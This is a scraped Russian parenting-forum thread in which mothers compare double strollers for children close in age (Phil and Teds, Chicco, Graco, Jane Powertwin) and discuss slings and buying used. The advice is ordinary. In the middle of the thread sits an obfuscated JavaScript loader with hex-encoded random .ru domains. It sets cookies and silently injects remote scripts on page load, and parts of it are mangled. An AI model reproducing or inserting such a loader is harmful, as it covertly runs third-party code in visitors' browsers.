Про коляску погодковую!

Посмотрите у меня в дневнике, я фила продаю очень даже бюджетно, всего за 8 тысяч рублей. В дневнике подробный пост с фото
30.10.2015
Благодарю, но я б/у не рассматриваю. Да и фил сам по себе мне вообще не нравится.
30.10.2015
Не знаю, купили ли вы уже коляску, случайно наткнулась на пост, но фила не рассматриваете зря. У меня двое подруг с погодками, у обеих фил, коляска самая удобная из всех возможных, по-моему. Маневренная, везде проходит, детям там вполне комфортно. Первую зиму младшие у них просто проспали целиком в люльках, подвешенные и прикрытые дождевиком, пока мамы со старшими целыми днями гуляли на площадках. Потом старшие переехали вниз на сидение, а младшие наверх, всем всё нравилось, пользовались до 3+ старших.
19.11.2015
Я в своем сыне совсем неуверена, он вообзе в коляске сидит крайне плохо. Я не спорю, может мои лпасения по поводу фила необоснованы, и он бы нам подошёл. Но уж слишком цена у него велика для экспериментов, будет жалко просто выкинуть такие деньги. А б/у покупать не хочу, какое-то у меня предубеждение. Да и брезглива очень.
23.11.2015
Понятно) Да, цена немаленькая. Ну насчёт ваших переживаний - можно купить дополнительный кап универсальный, у подруги был такой. А по поводу того, что младшая будет от вас отвёрнута, думаю, если с рождения она так будет, то привыкнет. Младшие вообще обычно лучше приспосабливаются)
23.11.2015
Между первыми двумя разница 2,1. Тогда я решила, что не погодки уже и старший большой. В итоге возила сына в люльке сидя в ногах у младшей. Или брала с собой эргорюкзак для старшего. Или прогулочную и в май-слинг младшую. А вечером с мужем гуляли с двумя колясками. В этот раз я решила, что хватит с меня такого веселья и нам нужна коляска для погодок. Тем более, разница поменьше, 1,5. Кстати, сын до сих пор норовит в коляске покататься при малейшей возможности. Жалею, что не взяла погодочную в первый раз. Очень жалею. Мы обошлись без неё? Да, обошлись. Без многих вещей люди обходятся, но при наличии эти же вещи облегчают нам жизнь
14.10.2015
Вот и я так думаю! Обойтись можно, но КАК и ЗАЧЕМ, если в принципе финансы позволяют купить недорогую коляску. Мне вот, например, будет неудобно гулять со старшим и со слингом. Во-первых март, ещё зима по сути, много одежды, да ещё ребенок тут висит. И как за старшим бегать и помогать ему лазить везде? Он у меня шилопоп страшный, ни секунды на месте, и на горку, и на качели, и в песочницу, и на статую залезть)) Навряд ли маленькому будет удобно спать при такой моей физ. активности. Сажать сверху на люльку тоже не хочу. Во-первых он у меня кабанчик, во-вторых, опять же шилопоп, он будет прыгать, вертеться, разбудит малыша или вообще придавит. В общем, я точно ЗА коляску) Осталось только выбрать какую))
15.10.2015
А коляску с подножкой для старшего ребёнка не рассматриваете? Я собираюсь стать мамой погодок, пока такой вариант кажет наиболее приемлемым
14.10.2015
Рассматривала как вариант, но думаю, это все-таки для деток постарше. В год и четыре месяца не сможет он столько на ней простоять, да ещё и держаться ручками все время. Он у меня егоза, обязательно будет с неё убегать и падать, ему все надо хватать! Да и к дитю спящему младшему полезет руками. Боюсь я такую штуку брать) Да и производители пишут, что она от 2 или 2,5 лет.
14.10.2015
Мы обошлись без коляски. Тоже очень много выбирала, смотрела, потом в итоге не купили. Обошлись. Младшая родилась зимой в январе, старшему на момент рождения было 1.5. Гуляли не спеша)
09.10.2015
Ой, не знаю...Выдержит ли моя нервная система такую прогулку...)
09.10.2015
Коляска вам обязательно понадобится. Это факт. Если ситуация с дверьми и лифтами позволяет я бы взяла бок о бок. Там как раз и обзор лучше когда малыш подрастёт, и управлять ими легче.
09.10.2015
В том-то и дело! В пассажирский такая скорее не войдёт, а грузовой вызвать проблема. Мне тоже они вообще-то больше по душе. [removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="14945",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
09.10.2015
В том-то и дело! В пассажирский такая скорее не войдёт, а грузовой вызвать проблема. Мне тоже они вообще-то больше по душе.
09.10.2015
У нас была Jane Powertwin, в ней спинка для младшего раскладывается на 170 градусов, т.е. месяцев с 4 можно катать. Мы ездили до возраста 3,5 года старшего. Супер-маневренна, управляется одной рукой, колеса надувные, проходят по любым сугробам, заходит маленький лифт. А в целом если про коляски - у нас погодковая появилась в 10 мес. младшего, когда он решительно захотел бегать ногами на улице, до этого старший ездил в одинарной, а младший в слинге, когда один ребенок на маме, то не приходится разрываться между двумя. Грудь всегда рядом, не надо бежать с прогулки домой кормить. В магазин выскочить тоже не проблема, одевать надо только одного старшего, второго под слингокуртку в чем дома был. Да и поесть-убраться-позаниматься со старшим развивашками без слинга тяжелее. В адаптации старшего к появлению маленького слинг тоже очень помогает, т.к. у мамы руки маленьким не заняты.
08.10.2015
Я со слингами как-то не дружу! У нас только слинг-рюкзак, но он с 4 месяцев. Слинг-шарф - боюсь, не будет времени в намотке разбираться, слинг на кольцах, говорят, вообще неудобен. А покупать ещё одну бесполезную вещь, которой не будем пользоваться, не хотелось бы)
09.10.2015
Слинг-рюкзак с момента самостоятельного сидения, а не с 4 месяцев. Слинг на кольцах подходит для короткого использования. Разобраться в намотке шарфа - это 30-40 минут, можно с консультантом, можно на встрече с другими слингомамами, если нет возможности оплатить услуги профессионала. Как по мне, так проще потратить 40 минут на освоение намотки и потом много месяцев не иметь проблем с тем, чтобы спокойно заниматься домашними делами и старшим ребенком :) Да и слинг не отменяет использование коляски, часто они идут вместе, когда как маме удобнее. Ну да это выбор каждого :)
09.10.2015
я обзор как-то делала про свою чикко)тут
08.10.2015
Спасибо, почитаю)
08.10.2015
Можно бу фила найти вполне по приемлемой цене, не дороже 20. Они хорошего качества и мало теряют в эксплуатации.
08.10.2015
Мне категорически не нравится, что в филе ребенок лежит практически на земле! Следовательно, нет корзины для покупок. Про обзор уж думаю и речи нет из этого доп.кресла. И вообще никогда не покупала ещё б/у. Не хочется начинать))
08.10.2015
ну на практике совсем другие ощущения) и внизу детям очень даже комфортно) старая там с удовольствием ездит, но ездит когда уже устала идти и нагулялась. А про бу тут хозяин барин конечно)
09.10.2015
У меня Graco Stadium Duo, она похожа на Chicco. Козырьками никогда особо не пользовалась, сейчас с переднего сиденья один козырёк совсем сняла, т.к. дочке все время хочется брата погладить или пощекотать :) Но обзору он не мешал. И вообще, когда сын начал сидеть, дочка решила с ним местами поменяться :)
08.10.2015
А как колеса? Мне они такими смешными кажутся, маленькие, узенькие. Не затрудняет это движения?
08.10.2015
Колеса крепкие. Мы по гравию, по лесным дорожкам, по пляжу катались. Конечно, где очень много песка, катить тяжело. Была коляска с широкими колёсами, так к ним снег зимой очень прилипал, а маленьким не липнет. Управлять коляской легко, поворачивается одной рукой. Есть небольшие трудности с поребриками, но это дело привычки, через месяц я уже легко с ними справлялась.
08.10.2015
Спасибо!)
08.10.2015
Комментарий удален
12.10.2015
Мы в частном доме, поэтому в лифте не доводилось кататься, но она лёгкая, по лестнице хорошо спускается и поднимается даже с одним ребёнком на борту.
12.10.2015
Да, к моей это тоже относится. Просто когда старший сидит впереди, это чувствуется. Сидел бы впереди младший - было бы легче, но старший на заднее сидение не влезет(
12.10.2015
У меня похожая Балу. Из минусов - тяжело маневрирует, ну и лифт только грузовой.
12.10.2015
я продаю ТАКО. Одно место люлька, второе сидячий блок. Катали близнецов. Если решитесь - пишите в л.с.
08.10.2015
Оставшиеся комментарии доступны после регистрации
Зарегистрируйтесь и получите полный доступ ко всем функциям сайта.
Помогите советом с Филом! !!!! Phil and Teds и крупный малыш